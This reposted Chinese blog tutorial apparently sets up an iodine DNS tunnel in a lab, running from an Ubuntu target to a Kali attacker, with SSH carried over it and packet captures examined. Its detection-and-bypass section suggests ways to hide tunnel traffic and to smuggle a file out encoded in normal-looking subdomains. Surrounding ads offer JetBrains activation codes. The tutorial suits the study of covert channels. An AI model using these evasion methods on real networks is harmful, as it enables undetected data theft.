内网穿透 隧道_内网渗透攻击

内网穿透 隧道_内网渗透攻击本文研究DNS隧道的一个经典工具,iodine

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全家桶1年46,售后保障稳定

前言

本文研究DNS隧道的一个经典工具,iodine

github:https://github.com/yarrick/iodine

一、概述

1、简介

持续更新,C语言编写,官方:http://code.kryo.se/iodine/

IPv4 over DNS,即通过DNS隧道转发IPv4数据包,在编码,请求类型上提供了更丰富的选择

  • 客户端为Win10时,环境搭建后,可连接成功,但无法ping通(即不可用!)
  • 支持直连和中继两种模式
  • 支持常见的DNS解析类型:A、CNAME、MX、TXT等

2、原理

DNS原理见:一文搞明白DNS与域名解析

通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一局域网(可以通过ping命令通信)。在客户端和服务端之间建立连接后,客户机上会多出一块“dns0”的虚拟网卡。
  
DNS隧道流程:iodine客户端->DNS服务商->iodined服务端

3、用法

(1)服务端

iodined -f -c -P <password> 10.0.0.1 vpn.abc.com -DD
-f:在前台运行
-c:禁止检查所有传入请求的客户端IP地址。
-P:客户端和服务端之间用于验证身份的密码。
-D:指定调试级别,-DD指第二级。“D”的数量随级别增加。
这里的10.0.0.1是自定义的局域网虚拟IP地址。

Jetbrains全家桶1年46,售后保障稳定

(2)客户端

linux环境:

iodine -f -P  <password> vpn.abc.ltd -M 200
-r:iodine有时会自动将DNS隧道切换为UDP隧道,该参数的作用是强制在任何情况下使用DNS隧道
-M:指定上行主机的大小。
-m:调节最大下行分片的大小。
-T:指定DNS请求类型TYPE,可选项有NULL、PRIVATE、TXT、SRV、CNAME、MX、A。
-O:指定数据编码规范。
-L:指定是否开启懒惰模式,默认开启。
-I:指定两个请求之间的时间间隔。

windows环境:

  • windows客户端可以直接使用编译好的windows版本,同时需要安装TAP网卡驱动程序。
  • 也可以下载OpenVPN,在安装时仅选择TAP-Win32驱动程序,安装后服务器上就会多出一块“TAP-Wndows ADApter V9”的网卡。
  • 运行客户端程序iodine:iodine -f -P <password> vpn.abc.com,如果出现提示“Connection setup complete, transmitting data”,就表示DNS隧道已经建立。

二、实践

1、测试场景

(1)攻击机

Kali2021 192.168.10.128

(2)DNS服务器

windows server 2008 :192.168.10.200

设置静态IP,参见https://blog.csdn.net/pockeyfan/article/details/42063683

新建A记录,指向服务端kali
在这里插入图片描述
新建一个委托(即NS记录)指向刚刚设定的A记录的域名
在这里插入图片描述
再建一个A记录指向windows server自己
在这里插入图片描述

(3)目标机

Ubuntu 18.04 192.168.10.129

由于模拟的是DNS服务器是真正的权威服务器,即目标机应该能DNS解析到DNS服务器,所以要把目标机的DNS解析改下

在这里插入图片描述
nslookup检测下

在这里插入图片描述

2、建立隧道

(1)服务端

建立隧道前状态
在这里插入图片描述
建立隧道

iodined -f -c -P 123456 10.0.0.1 dnstunnel.test.com -DD

在这里插入图片描述
此时多了一个网卡dns0,ip是我们设置的10.0.0.1
在这里插入图片描述

(2)客户端

建立隧道前状态
在这里插入图片描述
建立隧道

iodine -f -r -P 123456 dnstunnel.test.com

在这里插入图片描述
也是多了个网卡dns0,ip为10.0.0.2
在这里插入图片描述

(3)ssh

此时隧道建立成功,在服务端会打印出心跳包
在这里插入图片描述
尝试ssh
在这里插入图片描述
隧道成功建立,流量可代理
此时,打印出的包如下:

在这里插入图片描述

3、抓包看看

建立隧道,域名让人没眼看
在这里插入图片描述
虚拟网卡中TCP握手
在这里插入图片描述
心跳包,走了一个来回,域名太异常了
在这里插入图片描述
虚拟网卡中
在这里插入图片描述
ssh时
在这里插入图片描述
虚拟网卡中
在这里插入图片描述

三、探索

1、源码与分析

TODO

2、检测与绕过

(1)虚拟网卡

本工具会创建个虚拟网卡来处理TCP

没法避免

(2)记录类型

这对本工具问题不大,因为可以支持常见记录类型,上面实验里是没有指定,但可以指定为A就问题不大

(3)异常DNS数据包数量

利用隧道时,会有大量DNS数据包,且来自同一DNS服务器

绕过方法:中间加间隔,但这样就会导致速度非常慢

(4)异常域名

建立隧道和心跳包的域名都太异常了,使用隧道时的域名就更是长base64字符串了

绕过方法:心跳包用正常域名,使用隧道时将base64拆分,不过会大大增加数据包数量

比如现在要把一个文件名 finalexamanswer.doc 传出去
base64 一下 -> ZmluYWxleGFtYW5zd2VyLmRvYw
然后编码常用域名,变成 Zm -> zone.music.domain,lu -> login.user.domain,YW``yun.web.domain …

(5)心跳包

心跳包的间隔已经比较长了(3s),但是数量是问题

绕过方法:间隔可以随机,数量可以换UDP socket重新建立隧道

结语

类似于icmptunnel,构建虚拟网卡来实现隧道

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/219611.html原文链接:https://javaforall.net

(0)
上一篇 2025年7月5日 下午3:43
下一篇 2025年7月5日 下午4:15


相关推荐

  • 433MHz LoRa/FSK 无线频谱波形分析(频谱分析仪测试LoRa/FSK带宽、功率、频率误差等)

    433MHz LoRa/FSK 无线频谱波形分析(频谱分析仪测试LoRa/FSK带宽、功率、频率误差等)1、测试环境频谱分析仪:安捷伦N9020A无线通信频段:433MHz射频芯片:Sx1278天线:433MHz弹簧天线2、测试方法模仿国内测试机构的步骤:使用频谱分析仪,设置分析仪参数分别为RBW=300Hz,VBW=1kHz,Span=30kHz,Detector=Peak,Tracemode=Maxhold,Sweep=Autocou…

    2022年8月11日
    10
  • LeanBack:HorizontalGridView和VerticalGridView使用详解

    LeanBack:HorizontalGridView和VerticalGridView使用详解LeanBack 是 Google 官方推出的 TV 端的功能库 里面包含了很多在 TVAndroid 端开发常用的控件 本文重点介绍其对 RecyclerView 适配 TV 端做的封装 HorizontalGr VerticalGrid HorizontalGr 和 VerticalGrid 都继承自 RecyclerView 针对 TV 的特性 在 item 排版 焦点流转 上 失焦

    2026年3月16日
    2
  • 静态方法和非静态方法的区别

    静态方法和非静态方法的区别静态方法和非静态方法的区别 1 静态方法属于类所有 类实例化前即可使用 2 非静态方法可以访问类中的任何成员 静态方法只能访问类中的静态成员 3 因为静态方法在类实例化前就可以使用 而类中的非静态变量必须在实例化之后才能分配内存 4 static 内部只能出现 static 变量和其他 static 方法 而且 static 方法中还不能使用 this 等关键字 因为它是属于整个类 5 静态

    2026年3月18日
    3
  • pycharm断点调试教程_pycharm怎么debug

    pycharm断点调试教程_pycharm怎么debug前言如果你不会用IDE开发工具的debug,你在调试代码的时候可能会用print输出去调试,那样效率比较低。我们可以用Pycharm的debug来调试,当然如果你用的Jetbranis的其他产品,操作方法也是一样的。Pycharm的Debug(1)开启debug的方式:右键debug项目 工具栏的甲壳虫(2)常用按钮图解debugger栏:stepover(单步调试)程序代码越过子函数,但子函数会执行,且不进入。 stepinto(进入)在单步执行时,遇到子函数就进入.

    2022年8月26日
    9
  • RGBA四通道颜色空间

    RGBA四通道颜色空间RGBA 是代表 Red 红色 Green 绿色 Blue 蓝色 和 Alpha 的色彩空间 虽然它有的时候被描述为一个颜色空间 但是它其实仅仅是 RGB 模型的附加了额外的信息 采用的颜色是 RGB 可以属于任何一种 RGB 颜色空间 但是 Catmull 和 Smith 在 1971 至 1972 年间提出了这个不可或缺的 alpha 数值 使得 alpha 渲染和 alpha 合成变得可能 提出者以 alpha 来命名是源于经典的线性插值方

    2026年3月17日
    2
  • 13款国内外知名PHP集成环境的优缺点分析,PHP集成环境推荐、PHP绿色集成环境推荐「建议收藏」

    13款国内外知名PHP集成环境的优缺点分析,PHP集成环境推荐、PHP绿色集成环境推荐「建议收藏」在本地测试网站,有个集成环境直接测试还是蛮方便的,下面向各位推荐国内和国外各种牛逼的php集成环境 排名不分先后! Xampp集成环境下载解压就能使用了,还支持苹果系统,溜的飞起。英文界面,用着B格也提高了不少。优点:支持的系统多啊,软件使用简单,可视化界面缺点:没有集成VC运行库,遗憾  然后就是老牌的apm

    2022年6月28日
    31

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号